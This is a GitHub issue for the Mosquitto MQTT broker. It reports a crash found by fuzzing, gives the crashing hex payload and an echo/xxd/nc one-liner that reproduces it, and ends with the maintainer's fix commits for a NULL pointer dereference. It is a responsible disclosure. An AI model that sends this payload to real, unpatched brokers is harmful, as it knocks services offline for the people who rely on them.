Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Segmentation Fault #2163

Closed
PBearson opened this issue Apr 3, 2021 · 1 comment
Closed

Segmentation Fault #2163

PBearson opened this issue Apr 3, 2021 · 1 comment

Comments

@PBearson
Copy link

PBearson commented Apr 3, 2021

I was doing some fuzz testing and came across this bug that crashes Mosquitto (confirmed in 2.0.9 and 2.0.7). When a client sends a valid CONNECT packet followed by a malformed CONNACK packet, sometimes it crashes the broker due to a segmentation fault.

The payload: 101000044d5154540502003c03210014000029020001e000

How to replicate:
echo 101000044d5154540502003c03210014000029020001e000 | xxd -p -r | nc <host> <port>

Proof:

Segfault:
image

GDB info:
image

I can generate other payloads which trigger the same crash, in case they are needed. Let me know.
@ralight
Copy link
Contributor

ralight commented Apr 3, 2021

Thanks for the fuzzing and the report, I've just pushed a change to fix this and will be making a new release today.

@ralight ralight closed this as completed Apr 3, 2021
ralight added a commit that referenced this issue Apr 3, 2021
@ralight
Fix segfault on client sending malformed CONNACk.
fe0d920 
CVE-xxxx-xxxx: If an authenticated client connected with MQTT v5 sent a
malformed CONNACK message to the broker a NULL pointer dereference occurred,
most likely resulting in a segfault. This will be updated with the CVE
number when it is assigned.
Affects versions 2.0.0 to 2.0.9 inclusive.

Closes #2163. Thanks to Bryan Pearson.
ralight added a commit that referenced this issue Apr 3, 2021
@ralight
Fix segfault on client sending malformed CONNACk.
6a4a547 
CVE-xxxx-xxxx: If an authenticated client connected with MQTT v5 sent a
malformed CONNACK message to the broker a NULL pointer dereference occurred,
most likely resulting in a segfault. This will be updated with the CVE
number when it is assigned.
Affects versions 2.0.0 to 2.0.9 inclusive.

Closes #2163. Thanks to Bryan Pearson.
@github-actions github-actions bot locked as resolved and limited conversation to collaborators Aug 11, 2022
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@ralight @PBearson